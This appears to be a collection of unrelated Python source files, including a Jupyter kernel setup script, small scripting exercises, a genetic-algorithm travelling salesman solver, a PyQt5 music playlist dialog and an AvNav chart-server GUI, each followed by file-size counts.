#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
from setuptools import setup
here = os.path.abspath(os.path.dirname(__file__))
version_ns = {}
with open(os.path.join(here, 'toree', '_version.py')) as f:
exec(f.read(), {}, version_ns)
setup_args = dict(
name='toree',
author='Apache Toree Development Team',
author_email='dev@toree.incubator.apache.org',
description='A Jupyter kernel for enabling remote applications to interaction with Apache Spark.',
long_description = '''
This package will install Apache Toree as a Jupyter kernel.
Apache Toree is an effort undergoing incubation at the Apache Software
Foundation (ASF), sponsored by the Apache Incubator PMC.
Incubation is required of all newly accepted projects until a further review
indicates that the infrastructure, communications, and decision making process
have stabilized in a manner consistent with other successful ASF projects.
While incubation status is not necessarily a reflection of the completeness
or stability of the code, it does indicate that the project has yet to be
fully endorsed by the ASF.
''',
url='http://toree.incubator.apache.org/',
version=version_ns['__version__'],
license='Apache License 2.0',
platforms=[],
packages=['toree'],
include_package_data=True,
install_requires=[
'jupyter_core>=4.0',
'jupyter_client>=4.0',
'traitlets>=4.0, <5.0'
],
data_files=[],
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: SQL'
]
)
if 'setuptools' in sys.modules:
# setupstools turns entrypoint scripts into executables on windows
setup_args['entry_points'] = {
'console_scripts': [
'jupyter-toree = toree.toreeapp:main'
]
}
# Don't bother installing the .py scripts if if we're using entrypoints
setup_args.pop('scripts', None)
if __name__ == '__main__':
setup(**setup_args)
| 2,949 | 857 |
import threading
import sys
import subprocess
import eventlet
import eventlet.tpool
import eventlet.green.subprocess
from eventlet import green
eventlet.monkey_patch()
def consume(stream, pref=b'T> '):
print("CHK consume 1")
p = pref
while True:
print("CHK consume 2")
data = stream.read(1024)
print("CHK consume 3")
if not data:
break
if p:
data = p + data
p = None
sys.stdout.buffer.write(data.replace(b'\n', b'\n' + pref))
print("CHK consume 4")
sys.stdout.flush()
print("CHK consume 5")
def start_daemon_thread(fn):
thread = threading.Thread(target=fn)
thread.daemon = True
print("CHK start_daemon_thread 1")
thread.start()
print("CHK start_daemon_thread 2")
return thread
def consume_input():
print("CHK consume_input input")
while True:
line = input() + '\n'
print("CHK consume_input line", line)
proc.stdin.write(bytes(line, 'ascii'))
proc.stdin.flush()
proc = green.subprocess.Popen("cmd", stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0)
def spawn(fn):
print("CHK spawn")
return start_daemon_thread(fn)
#return eventlet.spawn(fn)
#return eventlet.tpool.execute(fn)
thread1 = spawn(lambda: consume(proc.stdout, b"T> "))
thread2 = spawn(lambda: consume(proc.stderr, b"E> "))
print("CHK sleeping")
eventlet.sleep(2)
consume_input()
| 1,488 | 515 |
"""CLI utils for easy command line extras."""
import click
from climatecontrol import core
def click_settings_file_option(
settings_obj: core.Climate, click_obj=click, option_name="settings", **kw
):
"""Build a `click` option decorator.
Args:
settings_obj: settings object to load configuration into.
click_obj: if a command
Example:
Given a command line script `cli.py`:
.. code-block:: python
import click
from climatecontrol import core, cli_utils
settings_map = settings_parser.Climate(env_prefix='TEST_STUFF')
@click.command()
@cli_utils.click_settings_file_option(settings_map)
def tmp_cli():
pass
And running the script:
.. code-block:: bash
python cli.py --settings 'my_settings_file.yaml'
will load settings from `my_settings_file.yaml` into the `settings_map`
object which can then be used in the script.
"""
def validate(ctx, param, value):
if value:
settings_obj.settings_files = value
settings_obj.update()
option_kwargs = dict(
help="Settings file path for loading settings from file.",
callback=validate,
type=click_obj.Path(exists=True, dir_okay=False, resolve_path=True),
expose_value=False,
is_eager=True,
multiple=True,
)
option_kwargs.update(kw)
option = click_obj.option(
"--{}".format(option_name), "-{}".format(option_name[0]), **option_kwargs
)
return option
| 1,591 | 454 |
"""
"""
from clldutils.clilib import PathType
from pyglottolog.references import evobib
def register(parser):
parser.add_argument(
'bib',
type=PathType(type='file'),
help='path to downloaded evobib-converted.bib')
def run(args): # pragma: no cover
evobib.update(args.bib, args.repos.bibfiles['evobib.bib'], args.log)
| 356 | 125 |
# import library
import datetime
# input nama user
nama = input("Hallo... nama saya Mr. Kompie, nama Anda siapa? ")
# tampilkan nama user
print("Oh.. nama Anda", nama, ", nama yang bagus sekali.")
# kasih jeda 3 detik
time.sleep(3)
# input tahun lahir
thnLahir = int(input("BTW... " + nama + "kamu lahir tahun berapa? "))
# kasih jeda 3 detik
time.sleep(3)
# hitung usia user
skrg = datetime.datetime.now()
usia = skrg.year - thnLahir
# tampilkan usia
print("Hmmm...", nama,"kamu sudah", usia,"tahun ya..")
# kasih jeda 3 detik
time.sleep(3)
# tampilkan pesan sesuai range usia
if (usia > 50):
print("Anda sudah cukup tua ya?")
print("Jaga kesehatan ya!!")
elif (usia > 20):
print("Ternyata Anda masih cukup muda belia")
print("Jangan sia-siakan masa mudamu ya!!")
elif (usia > 17):
print("Hihihi... Anda ternyata masih ABG")
print("Mulai berpikirlah secara dewasa ya!!")
elif (usia < 17):
print("Oalah.. Anda masih anak-anak toh?")
print("Jangan suka merengek-rengek minta jajan ya!!")
# kasih jeda 3 detik
time.sleep(3)
# say goodbye
print("OK.. see you later", nama, ".. senang berkenalan denganmu")
| 1,198 | 547 |
n = int(input())
person = []
for i in range(n):
a,b = map(str, input().split())
person.append((int(a),i,b))
for i in sorted(person): print(i[0],i[2]) | 155 | 67 |
"""Miscellaneous functions goes in here.
"""
from os import system
from config import OS
from strings import UtilsStrings as Strings
def clear_console() -> None:
"""Clear console terminal.
"""
command = "clear"
if OS in ("nt", "dos"):
command = "cls"
system(command)
def char_input() -> str:
"""Capture and return a single character representing the key pressed.
:return: Character pressed.
"""
if OS in ("nt", "dos"): # Get key on Windows
import msvcrt
key = msvcrt.getwche()
else: # Get key on UNIX
# Solution found on:
# https://www.semicolonworld.com/question/42804/python-read-a-single-character-from-the-user#comment-21
import sys
import tty
import termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
key = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return key
def int_input(message: str, min_val: int, max_val: int) -> int:
"""Get and validate integer input.
:param message: Message prompting the user to enter an integer.
:param min_val: Minimum valid value for the integer.
:param max_val: Maximum valid value for the integer.
:return: Validated integer input.
"""
while True:
response = input(message)
try:
# Input cannot be empty
if not response:
raise ValueError
response = int(response)
# Input must be between given interval
if response > max_val or response < min_val:
raise ValueError
except ValueError:
print(Strings.int_warning(min_val, max_val))
else:
return response
def text_input(message: str) -> str:
"""Get and validate string input.
:param message: Message prompting the user to enter a string.
:return: Validated string input.
"""
while True:
response = input(message)
if response:
return response
print(Strings.str_warning)
def bool_input(message: str) -> bool:
"""Get and validate a boolean input.
:param message: Message prompting the user to choose between true or false.
:return: Boolean choice from the user.
"""
while True:
print(message)
response = char_input().lower()
print()
if response in Strings.truthy:
return True
elif response in Strings.falsy:
return False
else:
print(Strings.bool_warning)
def stringify(obj_list: list[object]) -> list[str]:
"""Convert list of objects into list of strings.
:param obj_list: List of objects.
:return: List of strings.
"""
return [obj.__str__() for obj in obj_list]
| 2,888 | 826 |
# -*- coding: utf-8 -*-
"""
文档教程
https://sqxccdy.github.io/odpc/sql_build_model.html
"""
from sqltricks.create import *
from sqltricks.fields import *
from sqltricks.insert import *
from sqltricks.query import *
from sqltricks.drop import *
FORMAT = '%(asctime)-15s %(levelname)s::::%(message)s'
logging.basicConfig(format=FORMAT)
| 335 | 136 |
from unittest import TestCase
from microfreshener.core.importer import YMLImporter
from microfreshener.core.analyser.sniffer import SharedPersistencySmellSniffer
from microfreshener.core.analyser.smell import SharedPersistencySmell
from microfreshener.core.model.groups import Edge
class TestSharedPersitence(TestCase):
@classmethod
def setUpClass(self):
file = 'data/tests/test_sniffer_shpr.yml'
loader = YMLImporter()
self.micro_model = loader.Import(file)
self.shprSniffer = SharedPersistencySmellSniffer()
def test_shpr(self):
Datastore = self.micro_model["db"]
smell = self.shprSniffer.snif(Datastore)
self.assertIsInstance(smell, SharedPersistencySmell)
self.assertFalse(smell.isEmpty())
self.assertEqual(len(smell.getLinkCause()), 3)
self.assertEqual(len(smell.getNodeCause()), 0)
def test_shpr_database(self):
Datastore = self.micro_model["db1"]
smell = self.shprSniffer.snif(Datastore)
self.assertTrue(smell.isEmpty())
self.assertEqual(len(smell.getLinkCause()), 0)
self.assertEqual(len(smell.getNodeCause()), 0)
def test_shpr_service_to_database(self):
Datastore = self.micro_model["db2"]
smell = self.shprSniffer.snif(Datastore)
self.assertTrue(smell.isEmpty())
| 1,348 | 458 |
""" Given an m x n matrix of non-negative integers representing the height of
each unit cell in a continent, the "Pacific ocean" touches the left and top
edges of the matrix and the "Atlantic ocean" touches the right and bottom
edges.
Water can only flow in four directions (up, down, left, or right) from a cell
to another one with height equal or lower.
Find the list of grid coordinates where water can flow to both the Pacific
and Atlantic ocean.
Example:
Given the following 5x5 matrix:
Pacific ~ ~ ~ ~ ~
~ 1 2 2 3 (5) *
~ 3 2 3 (4)(4) *
~ 2 4 (5) 3 1 *
~ (6)(7) 1 4 5 *
~ (5) 1 1 2 4 *
* * * * * Atlantic
Return:
[[0, 4], [1, 3], [1, 4], [2, 2], [3, 0], [3, 1], [4, 0]] (positions with
parentheses in above matrix)
IDEA:
find the points which are peaks and meeting points in the same time
use marker +1 for one area and marker +2 for another one; the meeting point will have 1+2 == 3
"""
class Solution417:
pass
| 1,112 | 386 |
import random
import time
from functools import reduce
import hashlib
from collections import defaultdict
import numpy as np
from numba import njit
from numba.core import types
from numba.typed import Dict
from geneal.applications.tsp.mutation_strategies import MutationStrategies
from geneal.genetic_algorithms import ContinuousGenAlgSolver
from geneal.utils.exceptions import InvalidInput
mutation_options = {"random_swap", "random_inversion", "2-opt"}
allowed_mutations = {
"2-opt",
"random_swap",
"random_inversion",
"random_gene_nearest_neighbour",
"worst_gene_random",
"worst_gene_nearest_neighbour",
"select_any_mutation",
}
@njit
def fitness_function(individual, edges):
"""
Implements the logic that calculates the fitness
measure of an individual. It sums all the costs of going
from node to node in the tour.
:param individual: chromosome of genes representing an individual
:param edges: dictionary with cost between all nodes
:return: the fitness of the individual
"""
total_length = 0
for i in range(individual.shape[0] - 1):
total_length += edges[(individual[i], individual[i + 1])]
total_length += edges[(individual[0], individual[-1])]
return -round(total_length, 2)
def convert_to_typed_dict(G):
edges_dict = Dict.empty(
key_type=types.UniTuple(types.int64, 2), value_type=types.float64
)
edges_dict.update({(edge[1], edge[0]): G.edges[edge]["weight"] for edge in G.edges})
edges_dict.update({(edge[0], edge[1]): G.edges[edge]["weight"] for edge in G.edges})
return edges_dict
class TravellingSalesmanProblemSolver(MutationStrategies, ContinuousGenAlgSolver):
def __init__(
self,
graph,
mutation_strategy: str = "2-opt",
n_searches: int = 1,
numba_speedup: bool = False,
*args,
**kwargs,
):
self.check_input(kwargs, graph)
MutationStrategies.__init__(self, n_searches=n_searches)
ContinuousGenAlgSolver.__init__(self, n_crossover_points=2, *args, **kwargs)
if mutation_strategy not in allowed_mutations:
raise (InvalidInput(f"{mutation_strategy} is an invalid mutation strategy"))
if numba_speedup:
edges_dict = convert_to_typed_dict(graph)
self.fitness_function = lambda individual: fitness_function(
individual, edges_dict
)
self.G = graph
self.mutation_strategy = mutation_strategy
self.fitness_time = 0
self.chromosomes = defaultdict(int)
@staticmethod
def check_input(kwargs, graph):
if "n_crossover_points" in kwargs:
if kwargs["n_crossover_points"] != 2:
print("Defaulting 'n_crossover_points' to 2")
kwargs.pop("n_crossover_points")
if "n_genes" in kwargs:
if kwargs["n_genes"] > len(graph.nodes):
print(
f"'n_genes' can't be larger than the nodes in the graph. The number of genes "
f"will default to {len(graph.nodes)}."
)
kwargs["n_genes"] = len(graph.nodes)
else:
kwargs["n_genes"] = len(graph.nodes)
return kwargs
def fitness_function(self, individual):
"""
Implements the logic that calculates the fitness
measure of an individual. It sums all the costs of going
from node to node in the tour.
:param individual: chromosome of genes representing an individual
:return: the fitness of the individual
"""
start_time = time.time()
arr_hash = hashlib.sha1(individual).hexdigest()
if arr_hash in self.chromosomes:
res = self.chromosomes[arr_hash]
else:
res = reduce(
lambda total_length, city_pair: total_length
+ self.G.edges[(city_pair[0], city_pair[1])]["weight"],
zip(individual, individual[1:]),
0,
)
res += self.G.edges[(individual[0], individual[-1])]["weight"]
res = -round(res, 2)
self.chromosomes[arr_hash] = res
self.fitness_time += time.time() - start_time
return res
def initialize_population(self):
"""
Initializes the population of the problem. It creates a
matrix of size (pop_size x n_genes) containing permutations of the nodes
on each row.
:return: a numpy array with a randomized initialized population
"""
population = np.repeat(
np.arange(1, self.n_genes + 1)[np.newaxis, :], self.pop_size, axis=0
)
return np.array(list(map(lambda x: np.random.permutation(x), population)))
def create_offspring(self, first_parent, sec_parent, crossover_pt, _):
"""
Creates an offspring from 2 parents. It performs an OX crossover, which
combines genes from each parent, but maintaining the nodes order of the parents.
http://www.inf.tu-dresden.de/content/institutes/ki/cl/study/summer14/pssai/slides/GA_for_TSP.pdf
:param first_parent: first parent's chromosome
:param sec_parent: second parent's chromosome
:param crossover_pt: points at which to perform the crossover
:return: the resulting offspring.
"""
reordered_sec_parent = np.roll(sec_parent, -crossover_pt[1])
new_arr = first_parent[crossover_pt[0] : crossover_pt[1]]
new_arr = np.append(new_arr, reordered_sec_parent)
_, idx = np.unique(new_arr, return_index=True)
res = np.roll(new_arr[np.sort(idx)], crossover_pt[0])
if res.shape[0] != 30:
a = 1
return res
def mutate_population(self, population, n_mutations, **kwargs):
"""
Mutates the population using a 2-opt rule hybrid. It selects the number of rows
on which mutation will be applied, and then a applies a local search 2-opt rule
to those rows.
:param population: the population at a given iteration
:param n_mutations: number of mutations to be performed. This number is
calculated according to mutation_rate, but can be adjusted as needed inside this function
:return: the mutated population
"""
adjusted_n_mutations = np.ceil(n_mutations / self.n_genes).astype(int)
if adjusted_n_mutations == 0:
return population
mutation_rows = self.get_mutation_rows(adjusted_n_mutations, population)
mutation_strategy = self.mutation_strategy
if "mutation_strategy" in kwargs:
mutation_strategy = kwargs["mutation_strategy"]
if mutation_strategy == "2-opt":
return self.two_opt_mutation(population, mutation_rows)
elif mutation_strategy == "random_swap":
mutation_cols = self.get_mutation_cols(adjusted_n_mutations, population)
return self.random_swap_mutation(population, mutation_rows, mutation_cols)
elif mutation_strategy == "random_gene_around_nearest_neighbour":
return self.random_gene_around_nearest_neighbour_mutation(
population, mutation_rows
)
elif mutation_strategy == "random_gene_nearest_neighbour":
return self.random_gene_nearest_neighbour_mutation(
population, mutation_rows
)
elif mutation_strategy == "worst_gene_random":
return self.worst_gene_random_mutation(population, mutation_rows)
elif mutation_strategy == "worst_gene_nearest_neighbour":
return self.worst_gene_nearest_neighbour_mutation(population, mutation_rows)
elif mutation_strategy == "random_inversion":
return self.random_inversion_mutation(
population,
mutation_rows,
np.random.choice(int(population.shape[1] / 2), 1)[0],
)
elif mutation_strategy == "select_any_mutation":
selected_strategy = random.sample(mutation_options, 1)[0]
return self.mutate_population(
population, n_mutations, **{"mutation_strategy": selected_strategy}
)
else:
raise (InvalidInput(f"{mutation_strategy} is an invalid mutation strategy"))
def find_worst_gene(self, chromosome):
distances = [
self.G.edges[(chromosome[-1], chromosome[0])]["weight"]
+ self.G.edges[(chromosome[0], chromosome[1])]["weight"],
*[
self.G.edges[(city_pair[0], city_pair[1])]["weight"]
+ self.G.edges[(city_pair[1], city_pair[2])]["weight"]
for city_pair in zip(chromosome, chromosome[1:], chromosome[2:])
],
self.G.edges[(chromosome[-2], chromosome[-1])]["weight"]
+ self.G.edges[(chromosome[-1], chromosome[0])]["weight"],
]
worst_gene = np.argmax(distances)
return worst_gene
| 9,068 | 2,839 |
class Solution(object):
def combinationSum4(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
dp = [0] * (target + 1)
dp[0] = 1
for i in xrange(1, target+1):
fi = 0
for n in nums:
if i < n: continue
fi += dp[i - n]
dp[i] = fi
return dp[target]
nums = [1, 2, 3]
target = 4
print Solution().combinationSum4(nums, target) | 388 | 196 |
from PyQt5 import QtGui
from PyQt5.QtCore import Qt, QEvent, QModelIndex
from PyQt5.QtGui import QPixmap, QColor, QIcon, QCursor, QPainter, QPen
from PyQt5.QtWidgets import QWidget, QTableWidgetItem, \
QAction, QMenu, QLabel, QWidgetAction, QHBoxLayout
from src.Apps import Apps
from src.model.MusicList import MusicList
from src.ui.PlaylistDialogUI import Ui_Form
from src.util import util
class PlayListDialog(QWidget, Ui_Form):
def __init__(self, parent, ):
QWidget.__init__(self)
Ui_Form.__init__(self)
self.setupUi(self)
self.setParent(parent)
self.musicListService = Apps.musicListService
self.player = Apps.player
self.playlist = Apps.playlist
self.__init_ui()
self.__init_table_widget_ui()
self.__set_table_widget_width()
self.__initConnect()
def __initConnect(self):
self.playlist.changed.connect(self.onPlaylistChanged)
self.pushButton_2.clicked.connect(self.onClearBtnClicked)
self.tableWidget.cellPressed.connect(self.open_music_list)
self.tableWidget.doubleClicked.connect(self.onTableDoubleClicked)
self.tableWidget.customContextMenuRequested.connect(self.onRightClick)
def onPlaylistChanged(self):
playlist = self.playlist
self.setGeometry(self.parent().width() - 580, 150, 580,
self.parent().height() - 150 - 48)
self.tableWidget.clearContents()
self.tableWidget.setRowCount(playlist.size())
self.label.setText("共%d首" % playlist.size())
icon = QIcon("./resource/image/链接.png")
for i in range(playlist.size()):
self.btn_link = QLabel(self.tableWidget)
self.btn_link.setStyleSheet("background-color:rgba(0,0,0,0)")
self.btn_link.setPixmap(QPixmap("./resource/image/链接.png"))
self.btn_link.setAlignment(Qt.AlignCenter)
self.btn_link.setCursor(Qt.PointingHandCursor)
# self.btn_link.installEventFilter(self)
# icon_item = QTableWidgetItem()
# icon_item.setIcon(icon)
music = playlist.get(i)
self.tableWidget.setItem(i, 0, QTableWidgetItem("\t"))
self.tableWidget.setItem(i, 1, QTableWidgetItem(music.title))
self.tableWidget.setItem(i, 2, QTableWidgetItem(music.artist))
# self.tableWidget.setItem(i, 3, icon_item)
self.tableWidget.setCellWidget(i, 3, self.btn_link)
self.tableWidget.setItem(i, 4, QTableWidgetItem(util.format_time(music.duration)))
# 为当前音乐设置喇叭图标
icon_label = QLabel()
icon_label.setPixmap(QPixmap("./resource/image/musics_play.png"))
icon_label.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
icon_label.setCursor(Qt.PointingHandCursor)
self.tableWidget.setCellWidget(playlist.getIndex(), 0, icon_label)
# 当行数等于13时, maximum=0, row=14->maximum = 1, row=15->maximum=2, row=16->maximum=3
# 15-27
# print("table widget height: ", self.tableWidget.height())
# print("height: ", self.tableWidget.verticalScrollBar().height())
# print("maximum: ", self.tableWidget.verticalScrollBar().maximum())
# print("value:", self.tableWidget.verticalScrollBar().value())
# print("position:", self.tableWidget.verticalScrollBar().sliderPosition())
# self.tableWidget.verticalScrollBar().setSliderPosition(self.tableWidget.verticalScrollBar().maximum() / 2)
def onTableDoubleClicked(self, modelIndex: QModelIndex):
""" 当存放音乐列表的表格被双击 """
index = modelIndex.row()
self.playlist.setIndex(index)
self.player.play(self.playlist.getCurrentMusic())
self.tableWidget.selectRow(index)
def onClearBtnClicked(self):
""" 点击清空按钮 """
self.playlist.clear()
self.player.stop()
def open_music_list(self, row, column):
# 若点击的是链接按钮, 则跳转到对应的歌单页面
if column == 3:
music = self.playlist.get(row)
music_list = self.musicListService.get(music.mid)
self.parent().navigation.setFocus()
self.parent().navigation.setCurrentRow(2)
items = self.parent().navigation.findItems(music_list.name, Qt.MatchCaseSensitive)
item = None
for item_ in items:
data = item_.data(Qt.UserRole)
if music.mid == data.id:
item = item_
break
if item is not None:
data = item.data(Qt.UserRole)
self.parent().navigation.setCurrentItem(item)
self.parent().updateMusicList(data.id)
# 若是本地音乐
if data.id == 0:
self.parent().stackedWidget_2.setCurrentWidget(self.parent().local_music_page)
# 若是其他歌单
else:
self.parent().stackedWidget_2.setCurrentWidget(self.parent().music_list_detail)
self.parent().show_musics_data()
self.hide()
def onRightClick(self):
self.play_list_menu.clear()
act1 = self.create_widget_action("./resource/image/nav-播放.png", "播放(Enter)")
act2 = QAction("收藏到歌单(Ctrl+S)", self)
act3 = self.create_widget_action("./resource/image/打开文件.png", "打开文件所在目录")
act4 = self.create_widget_action("./resource/image/删除.png", "从列表中删除(Delete)")
self.play_list_menu.addAction(act1)
self.play_list_menu.addAction(act2)
# 获取被选中的行, 包括列
items = self.tableWidget.selectedItems()
# 被选中的行号
rows = set()
for item in items:
rows.add(item.row())
musics = []
for row in rows:
music = self.playlist.get(row)
musics.append(music)
# 只选中了一行
if len(rows) == 1:
self.play_list_menu.addAction(act3)
# 设置子菜单归属于act2
self.create_collect_menu(musics)
act2.setMenu(self.collect_menu)
self.play_list_menu.addMenu(self.collect_menu)
self.play_list_menu.addSeparator()
self.play_list_menu.addAction(act4)
act1.triggered.connect(lambda: self.parent().on_act_play(musics))
act3.triggered.connect(lambda: self.parent().on_act_open_file(musics))
act4.triggered.connect(lambda: self.onActDel(musics))
self.play_list_menu.exec(QCursor.pos())
def onActDel(self, musics: list):
cur = self.playlist.getCurrentMusic()
playing = False
for music in musics:
if music.path == cur.path and music.mid == cur.mid:
playing = True
for music in musics:
self.playlist.remove(music)
if playing:
self.parent().nextMusic()
def create_collect_menu(self, musics: list):
self.collect_menu.clear()
act0 = self.create_widget_action("./resource/image/添加歌单.png", "创建新歌单")
self.collect_menu.addAction(act0)
self.collect_menu.addSeparator()
mls = list(filter(lambda ml: ml.id != MusicList.DEFAULT_ID, self.musicListService.list_(MusicList())))
for music_list in mls:
act = self.create_widget_action("./resource/image/歌单.png", music_list.name, music_list)
self.collect_menu.addAction(act)
act.triggered.connect(lambda: self.parent().on_acts_choose(musics))
def __init_ui(self):
self.setWindowFlag(Qt.FramelessWindowHint)
self.tabWidget.setCurrentWidget(self.play_list)
self.tabWidget.tabBar().setCursor(Qt.PointingHandCursor)
self.tabWidget.setStyleSheet("QTabWidget::pane{border-top: 1px solid #e1e1e2;}" +
"QTabWidget::tab-bar{alignment:center;height:46px;}" +
"QTabBar::tab{height:26px;width:128px;border-radius:4px;}" +
"QTabBar::tab:selected{background-color:#7c7d86;color:#ffffff;}" +
"QTabBar::tab:!selected{background-color:#ffffff;color:#888888;}" +
"QTabBar::tab:!selected:hover{background:#f5f5f7;color:#666666;}"
)
self.widget.setStyleSheet(
"background:#f9f9f9;border:none;border-bottom:1px solid #efefef;border-left:1px solid #c3c3c4;")
self.label.setStyleSheet("border:none")
self.label_2.setStyleSheet("border:none")
self.widget_2.setStyleSheet(
"background:#f9f9f9;border:none;border-bottom:1px solid #efefef;border-left:1px solid #c3c3c4;")
self.pushButton.setStyleSheet("QPushButton{color:#666666;border:none;}QPushButton:hover{color:#444444;}")
self.pushButton_2.setStyleSheet("QPushButton{color:#666666;border:none;}QPushButton:hover{color:#444444;}")
self.pushButton.setCursor(Qt.PointingHandCursor)
self.pushButton_2.setCursor(Qt.PointingHandCursor)
# 播放列表右键菜单
self.play_list_menu = QMenu()
# 鼠标移到收藏到歌单时的二级菜单
self.collect_menu = QMenu()
self.play_list_menu.setStyleSheet(
"QMenu{background-color:#fafafc;border:1px solid #c8c8c8;font-size:13px;width:214px;}" +
"QMenu::item {height:36px;padding-left:44px;padding-right:60px;}" +
"QMenu::item:selected {background-color:#ededef;}" +
"QMenu::separator{background-color:#ededef;height:1px}")
self.collect_menu.setStyleSheet(
"QMenu{background-color:#fafafc;border:1px solid #c8c8c8;font-size:13px;width:214px;}" +
"QMenu::item {height:36px;padding-left:44px;padding-right:60px;}" +
"QMenu::item:selected {background-color:#ededef;}" +
"QMenu::separator{background-color:#ededef;height:1px}")
def __init_table_widget_ui(self):
self.tableWidget.setColumnCount(5)
self.tableWidget.setHorizontalHeaderLabels(["", "音乐标题", "歌手", "专辑", "时长"])
self.tableWidget.horizontalHeader().setHidden(True)
self.tableWidget.setStyleSheet("QTableWidget{border:none;border-left:1px solid #c0c0c1;background:#fafafa;}" +
"QTableWidget::item::selected{background-color:#e3e3e5}")
def __set_table_widget_width(self):
self.tableWidget.setColumnWidth(0, self.width() * 0.03)
self.tableWidget.setColumnWidth(1, self.width() * 0.63)
self.tableWidget.setColumnWidth(2, self.width() * 0.17)
self.tableWidget.setColumnWidth(3, self.width() * 0.05)
self.tableWidget.setColumnWidth(4, self.width() * 0.12)
def create_widget_action(self, icon, text, data=None):
act = QWidgetAction(self)
act.setText(text)
if data is not None:
act.setData(data)
widget = QWidget(self)
layout = QHBoxLayout()
layout.setContentsMargins(13, -1, -1, 11)
layout.setSpacing(13)
lb_icon = QLabel(widget)
lb_icon.resize(18, 18)
lb_text = QLabel(text, widget)
if icon != "":
lb_icon.setPixmap(QPixmap(icon))
widget.setStyleSheet("QWidget:hover{background:#ededef} QWidget{color:#000000;font-size:13px;}")
layout.addWidget(lb_icon)
layout.addWidget(lb_text)
layout.addStretch()
widget.setLayout(layout)
act.setDefaultWidget(widget)
return act
def eventFilter(self, QObject, QEvent_):
if self.btn_link == QObject:
if QEvent_.type() == QEvent.MouseButtonPress:
item = self.tableWidget.currentItem()
if item is not None:
pass
return super().eventFilter(QObject, QEvent_)
def paintEvent(self, QPaintEvent):
# 画出边框线
paint = QPainter()
paint.begin(self)
pen = QPen()
pen.setColor(QColor("#c3c3c4"))
paint.setPen(pen)
paint.drawLine(0, 0, self.width(), 0)
paint.drawLine(0, 0, 0, self.tabWidget.tabBar().height())
# 画出头部背景
brush = QtGui.QBrush(QColor("#f4f4f6"))
brush.setStyle(Qt.SolidPattern)
paint.setBrush(brush)
paint.drawRect(0, 0, self.width(), self.tabWidget.tabBar().height())
| 12,188 | 4,100 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ts=2 sw=2 et ai
###############################################################################
# Copyright (c) 2012,2014 Andreas Vogel andreas@wellenvogel.net
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
###############################################################################
import optparse
import sys
import os
import wx
from avnav_gui_design import *
AVNAV_VERSION="development"
try:
from avnav_gui_version import AVNAV_VERSION
except:
pass
import subprocess
import re
__author__ = 'andreas'
class AvnavGui(Avnav):
def __init__(self, *args, **kwds):
Avnav.__init__(self, *args, **kwds)
self.defaultOut=os.path.join(os.path.expanduser("~"),"AvNavCharts")
self.serverbase=os.path.join(os.path.expanduser("~"),"avnav")
self.txLogfile.SetValue(os.path.join(self.defaultOut,"avnav-chartconvert.log"))
self.outputDir.SetValue(self.defaultOut)
self.server=None
self.serverRunning=False
self.converter=None
self.timer=wx.Timer(self,1)
self.Bind(wx.EVT_TIMER, self.OnTimer)
self.timer.Start(500)
self.urlmap=None
self.SetTitle("Avnav - %s"%(AVNAV_VERSION))
pass
def setServerBase(self, base):
self.serverbase=base
def setUrlMap(self, base):
self.urlmap = base
def btExitClicked(self, event):
self.terminateServer()
self.terminateConverter()
self.Close(True)
def getBaseDir(self):
dir=os.path.join(os.path.dirname(os.path.realpath(__file__)))
return dir
def doStartServer(self):
if self.checkServerRunning():
return
script=os.path.join(self.getBaseDir(),"..","server","avnav_server.py")
args=["xterm","-hold","-e",sys.executable,script,"-c",os.path.join(self.outputDir.GetValue(),"out")]
if self.urlmap is not None:
args.append("-u")
args.append(self.urlmap)
args.append("-w")
args.append(self.serverbase)
args.append(os.path.join(self.serverbase,"avnav_server.xml"))
self.server=subprocess.Popen(args,cwd=self.getBaseDir())
self.checkServerRunning()
def terminateServer(self):
if self.server is not None:
try:
self.server.terminate()
except:
pass
def checkServerRunning(self):
if self.server is not None:
try:
if self.server.poll() is None:
#still running
if not self.serverRunning:
self.serverPid.SetLabel(str(self.server.pid))
self.serverPid.SetForegroundColour(wx.Colour(0,255, 0))
self.btStartServer.SetLabel("Stop Server")
self.serverRunning=True
return True
except:
try:
self.server.terminate()
except:
pass
#seems to be not running
if self.serverRunning:
self.serverPid.SetLabel("server stopped")
self.serverPid.SetForegroundColour(wx.Colour(255,0, 0))
self.btStartServer.SetLabel("Start Server")
self.serverRunning=False
return False
def checkConverterRunning(self):
if self.converter is not None:
try:
if self.converter.poll() is None:
return True
#we stopped
if self.startServer.IsChecked():
self.doStartServer()
self.btStart.SetLabel("Start")
except:
self.btStart.SetLabel("Start")
try:
self.converter.terminate()
except:
pass
self.converter=None
return False
def terminateConverter(self):
if self.checkConverterRunning():
try:
self.converter.terminate()
except:
pass
def btStartServerClicked(self, event):
if self.serverRunning:
self.terminateServer()
self.checkServerRunning()
return
self.doStartServer()
def OnTimer(self,evt):
self.checkServerRunning()
